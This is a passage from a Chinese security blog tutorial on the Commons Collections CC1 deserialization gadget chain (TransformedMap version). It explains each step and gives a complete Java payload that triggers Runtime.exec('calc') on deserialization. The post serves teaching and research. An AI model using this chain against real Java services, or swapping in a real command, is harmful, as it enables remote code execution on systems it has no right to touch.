<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">    <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),          <span class="comment">// 1. 输出 Runtime.class</span></span><br><span class="line">    <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>,              <span class="comment">// 2. 拿到 getRuntime 方法</span></span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;,</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[<span class="number">0</span>]&#125;),</span><br><span class="line">    <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>,                 <span class="comment">// 3. 调用 getRuntime() 拿到实例</span></span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;,</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[<span class="number">0</span>]&#125;),</span><br><span class="line">    <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,                   <span class="comment">// 4. 执行 exec(&quot;calc&quot;)</span></span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,</span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">ChainedTransformer</span> <span class="variable">chain</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line">chain.transform(<span class="literal">null</span>); <span class="comment">// 入参是 null，因为第一步 ConstantTransformer 会忽略输入</span></span><br></pre></td></tr></table></figure>

<p>效果：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image7.png"></p>
<hr>
<h3 id="第四步：谁来触发-transform-——-TransformedMap"><a href="#第四步：谁来触发-transform-——-TransformedMap" class="headerlink" title="第四步：谁来触发 transform() —— TransformedMap"></a>第四步：谁来触发 transform() —— TransformedMap</h3><p>现在问题变成：<strong>谁会调用 <code>chain.transform()</code>？</strong></p>
<p>**<code>TransformedMap</code>**——当 Map 的值被修改时，会自动调用 <code>valueTransformer.transform()</code>。不过它是 protected 类型，不能直接使用，需要找到调用这个方法的入口。</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image8.png"></p>
<p>另外还有一个要求：<code>valueTransformer</code> 是<strong>可控的</strong>，可控的话只要传入 <code>chain</code> 就行。</p>
<p>查找可以传入可控 <code>valueTransformer</code> 的方法：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image9.png"></p>
<p>不过这个也是 protected，不能直接调用，需要找公共的入口方法。</p>
<ul>
<li><strong>第一步</strong>：找公开调用 <code>checkSetValue</code> 的方法——用 Alt+F7 或右键查找用法，找到 <code>setValue</code>：</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image10.png"></p>
<ul>
<li><strong>第二步</strong>：找公开调用 <code>TransformedMap</code> 的方法，找到两个，使用第一个（第二个会使链断掉）：</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image11.png"></p>
<p>使用 <code>TransformedMap.decorate(map, null, chain)</code> 就能正常传入我们的链条了：</p>
<p>运行时提示</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image12.png"></p>
<p><code>map</code> 值不能为空，构造一个：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Map</span> <span class="variable">innerMap</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">innerMap.put(<span class="string">&quot;value&quot;</span>, <span class="string">&quot;xxx&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">Map</span> <span class="variable">transformedMap</span> <span class="operator">=</span> TransformedMap.decorate(innerMap, <span class="literal">null</span>, chain);</span><br></pre></td></tr></table></figure>

<blockquote>
<p>注意：<code>key</code> 和 <code>value</code> 填什么都行——因为 <code>ConstantTransformer</code> 第一步就把输入忽略了。不过后面 <code>AnnotationInvocationHandler</code> 里有条件判断，<code>key</code> 必须填 <code>&quot;value&quot;</code>，后面会讲到。</p>
</blockquote>
<p>还差最开始的触发方法，它在两个类的下面：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image13.png"></p>
<hr>
<h3 id="第五步：找到自动调用-setValue-的地方-——-AnnotationInvocationHandler"><a href="#第五步：找到自动调用-setValue-的地方-——-AnnotationInvocationHandler" class="headerlink" title="第五步：找到自动调用 setValue 的地方 —— AnnotationInvocationHandler"></a>第五步：找到自动调用 setValue 的地方 —— AnnotationInvocationHandler</h3><p>右键查找谁调用了 <code>setValue</code>，结果有很多：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image14.png"></p>
<p>最终找到的是 <code>AnnotationInvocationHandler.class</code> 里的 <code>readObject</code> 方法——这就是我们想要的终点，<code>readObject</code> 会被反序列化自动调用，<code>setValue</code> 在其 <code>for</code> 循环里：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image15.png"></p>
<p>但是有判断条件需要满足：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 条件一：用 key 去注解里查有没有这个方法</span></span><br><span class="line"><span class="type">Class</span> <span class="variable">var7</span> <span class="operator">=</span> (Class)var3.get(var6);</span><br><span class="line"><span class="keyword">if</span> (var7 != <span class="literal">null</span>) &#123; <span class="comment">// 查不到就跳过，setValue 永远不执行</span></span><br></pre></td></tr></table></figure>

<p>所以 map 的 <code>key</code> 就是用来查注解方法的，查不到 <code>var7</code> 为 null，整个 if 块跳过，链断掉。<code>@Target</code> 只有 <code>value()</code> 这一个方法，所以 **key 必须填 <code>&quot;value&quot;</code>**。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 条件二：类型不匹配才会进 if 块</span></span><br><span class="line"><span class="keyword">if</span> (!var7.isInstance(var8) &amp;&amp; !(var8 <span class="keyword">instanceof</span> ExceptionProxy)) &#123;</span><br><span class="line">    var5.setValue(...) <span class="comment">// 只有类型不匹配才进这里</span></span><br></pre></td></tr></table></figure>

<p><code>var7</code> 是注解方法的返回类型（<code>ElementType[]</code>），<code>var8</code> 是我们 map 里的值。只有类型不匹配，才会进 if 块调 <code>setValue()</code>。我们放字符串 <code>&quot;xxx&quot;</code>，显然不是 <code>ElementType[]</code>，条件满足。</p>
<hr>
<h3 id="第六步：构造-AnnotationInvocationHandler"><a href="#第六步：构造-AnnotationInvocationHandler" class="headerlink" title="第六步：构造 AnnotationInvocationHandler"></a>第六步：构造 AnnotationInvocationHandler</h3><p>先找到 <code>AnnotationInvocationHandler</code> 的构造方法，看它需要什么参数：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image17.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image18.png"></p>
<p>两个参数：</p>
<ul>
<li><code>var1</code>：<code>Class&lt;? extends Annotation&gt;</code>，必须是一个<strong>注解类</strong></li>
<li><code>var2</code>：<code>Map&lt;String, Object&gt;</code>，就是我们的 <code>transformedMap</code></li>
</ul>
<p>但是这个类<strong>不能直接引用</strong>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image19.png"></p>
<p>所以利用反射调用这个类：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line"><span class="type">Constructor</span> <span class="variable">constructor</span> <span class="operator">=</span> clazz.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">constructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">handler</span> <span class="operator">=</span> constructor.newInstance(Target.class, transformedMap);</span><br></pre></td></tr></table></figure>

<blockquote>
<p>这种反射构造的方法很多类都适用，但高版本 JDK 加了限制（<code>setAccessible</code> 会被 Module 系统拦截），这也是 CC1 依赖低版本 JDK 的原因之一。</p>
</blockquote>
<hr>
<h2 id="完整-Payload"><a href="#完整-Payload" class="headerlink" title="完整 Payload"></a>完整 Payload</h2><p>加上序列化和反序列化，完整 payload 如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> &lt;Set&gt; <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> ClassNotFoundException,</span><br><span class="line">            NoSuchMethodException, InvocationTargetException,</span><br><span class="line">            InstantiationException, IllegalAccessException, IOException &#123;</span><br><span class="line"></span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),          <span class="comment">// 1. 输出 Runtime.class</span></span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>,              <span class="comment">// 2. 拿到 getRuntime 方法</span></span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[<span class="number">0</span>]&#125;),</span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>,                 <span class="comment">// 3. 调用 getRuntime() 拿到实例</span></span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[<span class="number">0</span>]&#125;),</span><br><span class="line">            <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,                   <span class="comment">// 4. 执行 exec(&quot;calc&quot;)</span></span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="type">ChainedTransformer</span> <span class="variable">chain</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line"></span><br><span class="line">        <span class="type">Map</span> <span class="variable">innerMap</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">        innerMap.put(<span class="string">&quot;value&quot;</span>, <span class="string">&quot;xxx&quot;</span>);</span><br><span class="line">        <span class="type">Map</span> <span class="variable">transformedMap</span> <span class="operator">=</span> TransformedMap.decorate(innerMap, <span class="literal">null</span>, chain);</span><br><span class="line"></span><br><span class="line">        <span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">constructor</span> <span class="operator">=</span> clazz.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">        constructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">handler</span> <span class="operator">=</span> constructor.newInstance(Target.class, transformedMap);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 序列化</span></span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">baos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(baos);</span><br><span class="line">        oos.writeObject(handler);</span><br><span class="line">        <span class="type">byte</span>[] payload = baos.toByteArray();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 反序列化（触发链）</span></span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(payload));</span><br><span class="line">        ois.readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>效果：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/%E5%89%8D%E8%A8%80_image20.png"></p>
<hr>
<h2 id="完整调用链总结"><a href="#完整调用链总结" class="headerlink" title="完整调用链总结"></a>完整调用链总结</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">反序列化</span><br><span class="line">  └─ AnnotationInvocationHandler.readObject()   ← 自动触发</span><br><span class="line">       └─ Map.Entry.setValue()</span><br><span class="line">            └─ TransformedMap.checkSetValue()</span><br><span class="line">                 └─ ChainedTransformer.transform()</span><br><span class="line">                      ├─ ConstantTransformer       → Runtime.class</span><br><span class="line">                      ├─ InvokerTransformer        → getMethod(&quot;getRuntime&quot;)</span><br><span class="line">                      ├─ InvokerTransformer        → invoke() → Runtime 实例</span><br><span class="line">                      └─ InvokerTransformer        → exec(&quot;calc&quot;)  🎯</span><br></pre></td></tr></table></figure>

<p>所以最终我们要序列化的对象就是 <code>AnnotationInvocationHandler</code>，整个 CC1 链（TransformedMap 版）就这样串起来了。</p>
<p>后续还有 LazyMap 版本的 CC1，触发点不同，但 Transformer 链的核心部分是一样的，到时候再对比着看。</p>
</article>
<div class="article-footer">
    <section id="license">
      <div class="header"><span>许可协议</span></div>
      <div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
</div>
    </section>
    

</div>

<div class="related-wrap" id="read-next"><section class="body"><div class="item" id="prev"><div class="note">较新文章</div><a href="/posts/cs47-modify/">工具魔改 | Cobalt Strike 4.7 特征修改与流量混淆</a></div><div class="item" id="next"><div class="note">较早文章</div><a href="/posts/e90faa78/">代码审计 | FastJSON 1.2.47 不出网利用 —— BCEL 链分析 | setter 与 getter 触发对比</a></div></section></div>






<footer class="page-footer footnote"><hr><div class="text"></div></footer>
<div class="main-mask" onclick="sidebar.dismiss()"></div></div><aside class="l_right">
<div class="widgets">

<widget class="widget-wrapper toc" id="data-toc" collapse="false"><div class="widget-header dis-select"><span class="name">本文目录</span><a class="cap-action" onclick="sidebar.toggleTOC()" ><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg></a></div><div class="widget-body"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95"><span class="toc-text">目录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%80%E7%BB%88%E7%9B%AE%E6%A0%87%E6%98%AF%E4%BB%80%E4%B9%88"><span class="toc-text">最终目标是什么</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E8%B0%83%E7%94%A8%E5%87%BD%E6%95%B0"><span class="toc-text">通过反射调用函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%86%E5%AE%9E%E9%99%85%E5%9C%BA%E6%99%AF%E4%B8%AD%E6%B2%A1%E5%9C%B0%E6%96%B9%E5%86%99%E4%BB%A3%E7%A0%81%E6%80%8E%E4%B9%88%E5%8A%9E"><span class="toc-text">但实际场景中没地方写代码怎么办</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E5%BC%8F-A%EF%BC%9A%E7%9B%B4%E6%8E%A5%E4%BC%A0%E8%BE%93-Payload%EF%BC%88CC-%E9%93%BE%EF%BC%89"><span class="toc-text">方式 A：直接传输 Payload（CC 链）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E5%BC%8F-B%EF%BC%9A%E8%BF%9C%E7%A8%8B%E7%B1%BB%E5%8A%A0%E8%BD%BD"><span class="toc-text">方式 B：远程类加载</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Gadget-Chain-%E7%9A%84%E7%94%B1%E6%9D%A5"><span class="toc-text">Gadget Chain 的由来</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CC1-%E9%93%BE%E6%9E%84%E9%80%A0%E8%BF%87%E7%A8%8B"><span class="toc-text">CC1 链构造过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87"><span class="toc-text">环境准备</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E6%AD%A5%EF%BC%9A%E6%89%BE%E5%88%B0%E8%83%BD%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E7%9A%84%E7%82%B9-%E2%80%94%E2%80%94-InvokerTransformer"><span class="toc-text">第一步：找到能执行命令的点 —— InvokerTransformer</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E6%AD%A5%EF%BC%9ARuntime-%E4%B8%8D%E8%83%BD%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%8E%E4%B9%88%E5%8A%9E"><span class="toc-text">第二步：Runtime 不能序列化怎么办</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%89%E6%AD%A5%EF%BC%9A%E8%B0%81%E6%9D%A5%E4%B8%B2%E8%81%94%E8%B0%83%E7%94%A8-%E2%80%94%E2%80%94-ChainedTransformer"><span class="toc-text">第三步：谁来串联调用 —— ChainedTransformer</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E5%9B%9B%E6%AD%A5%EF%BC%9A%E8%B0%81%E6%9D%A5%E8%A7%A6%E5%8F%91-transform-%E2%80%94%E2%80%94-TransformedMap"><span class="toc-text">第四步：谁来触发 transform() —— TransformedMap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%94%E6%AD%A5%EF%BC%9A%E6%89%BE%E5%88%B0%E8%87%AA%E5%8A%A8%E8%B0%83%E7%94%A8-setValue-%E7%9A%84%E5%9C%B0%E6%96%B9-%E2%80%94%E2%80%94-AnnotationInvocationHandler"><span class="toc-text">第五步：找到自动调用 setValue 的地方 —— AnnotationInvocationHandler</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E5%85%AD%E6%AD%A5%EF%BC%9A%E6%9E%84%E9%80%A0-AnnotationInvocationHandler"><span class="toc-text">第六步：构造 AnnotationInvocationHandler</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4-Payload"><span class="toc-text">完整 Payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4%E8%B0%83%E7%94%A8%E9%93%BE%E6%80%BB%E7%BB%93"><span class="toc-text">完整调用链总结</span></a></li></ol></div><div class="widget-footer"><a class="top" onclick="util.scrollTop()"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><!-- Icon from Solar by 480 Design - https://creativecommons.org/licenses/by/4.0/ --><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="1.5"><path stroke-linejoin="round" d="m9 15.5l3-3l3 3m-6-4l3-3l3 3"/><path d="M7 3.338A9.95 9.95 0 0 1 12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10S2 17.523 2 12c0-1.821.487-3.53 1.338-5"/></g></svg><span>回到顶部</span></a></div></widget>

<widget class="widget-wrapper linklist collapsible-widget"><div class="widget-header dis-select"><span class="name">文章分类</span><span class="collapse-toggle"><i class="fas fa-chevron-down"></i></span></div><div class="widget-body fs14"><div class="linklist left style-1" style="grid-template-columns:repeat(1,1fr);"><a class="link" title="代码审计" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"><div class="flex"><span>代码审计</span><span class="count">6</span></div></a><a class="link" title="笔记" href="/categories/%E7%AC%94%E8%AE%B0/"><div class="flex"><span>笔记</span><span class="count">2</span></div></a><a class="link" title="工具魔改" href="/categories/%E5%B7%A5%E5%85%B7%E9%AD%94%E6%94%B9/"><div class="flex"><span>工具魔改</span><span class="count">4</span></div></a><a class="link" title="vulnhub-DC" href="/categories/vulnhub-DC/"><div class="flex"><span>vulnhub-DC</span><span class="count">9</span></div></a><a class="link" title="DVWA" href="/categories/DVWA/"><div class="flex"><span>DVWA</span><span class="count">3</span></div></a><a class="link" title="靶机渗透" href="/categories/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/"><div class="flex"><span>靶机渗透</span><span class="count">1</span></div></a><a class="link" title="靶场" href="/categories/%E9%9D%B6%E5%9C%BA/"><div class="flex"><span>靶场</span><span class="count">1</span></div></a></div></div></widget>
</div></aside><div class='float-panel'>
  <button type='button' style='display:none' class='laptop-only rightbar-toggle mobile' onclick='sidebar.rightbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg>
  </button>
  <button type='button' style='display:none' class='mobile-only leftbar-toggle mobile' onclick='sidebar.leftbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 11c0-3.771 0-5.657 1.172-6.828C4.343 3 6.229 3 10 3h4c3.771 0 5.657 0 6.828 1.172C22 5.343 22 7.229 22 11v2c0 3.771 0 5.657-1.172 6.828C19.657 21 17.771 21 14 21h-4c-3.771 0-5.657 0-6.828-1.172C2 18.657 2 16.771 2 13z"/><path id="sep" stroke-linecap="round" d="M5.5 10h6m-5 4h4m4.5 7V3"/></g></svg>
  </button>
</div>
</div><div class="scripts">


<script type="text/javascript">
  window.canonical = {"originalHost":null,"officialHosts":["localhost"],"encoded":""};
  const ctx = {
    date_suffix: {
      just: `刚刚`,
      min: `分钟前`,
      hour: `小时前`,
      day: `天前`,
    },
    root : `/`,
    tag_plugins: {
      chat: Object.assign({"api":"https://siteinfo.listentothewind.cn/api/v1"}),
    }
  };

  // required plugins (only load if needs)
  if (`local_search`) {
    ctx.search = {};
    ctx.search.service = `local_search`;
    if (ctx.search.service == 'local_search') {
      let service_obj = Object.assign({}, `{"field":"all","path":"/search.json","content":true,"skip_search":null,"sort":"-date"}`);
      ctx.search[ctx.search.service] = service_obj;
    }
  }
  const def = {
    avatar: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/3442075.svg`,
    cover: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/cover/76b86c0226ffd.svg`,
    loading: `https://api.iconify.design/eos-icons:three-dots-loading.svg?color=%231cd0fd`,
  };
  const deps = {
    jquery: `https://gcore.jsdelivr.net/npm/jquery@3.7/dist/jquery.min.js`,
    marked: `https://gcore.jsdelivr.net/npm/marked@13.0/lib/marked.umd.min.js`,
    lazyload: `/%5Bobject%20Object%5D`
  }
  

</script>

<script type="text/javascript">
  
  function RunItem() {
    this.list = []; // 存放回调函数
    this.start = () => {
      for (var i = 0; i < this.list.length; i++) {
        this.list[i].run();
      }
    };
    this.push = (fn, name, setRequestAnimationFrame = true) => {
      let myfn = fn
      if (setRequestAnimationFrame) {
        myfn = () => {
          utils.requestAnimationFrame(fn)
        }
      }
      var f = new Item(myfn, name);
      this.list.push(f);
    };
    this.remove = (name) => {
      for (let index = 0; index < this.list.length; index++) {
        const e = this.list[index];
        if (e.name == name) {
          this.list.splice(index, 1);
        }
      }
    }
    // 构造一个可以run的对象
    function Item(fn, name) {
      // 函数名称
      this.name = name || fn.name;
      // run方法
      this.run = () => {
        try {
          fn()
        } catch (error) {
          console.log(error);
        }
      };
    }
  }

  const utils = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    css: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    js: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script');
      if (src.startsWith('/')) {
        src = ctx.root + src.substring(1);
      }
      script.src = src;
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
      script.onerror = reject
      script.onload = script.onreadystatechange = function () {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    jq: (fn) => {
      if (typeof jQuery === 'undefined') {
        utils.js(deps.jquery).then(fn)
      } else {
        fn()
      }
    },

    onLoading: (el) => {
      if (el) {
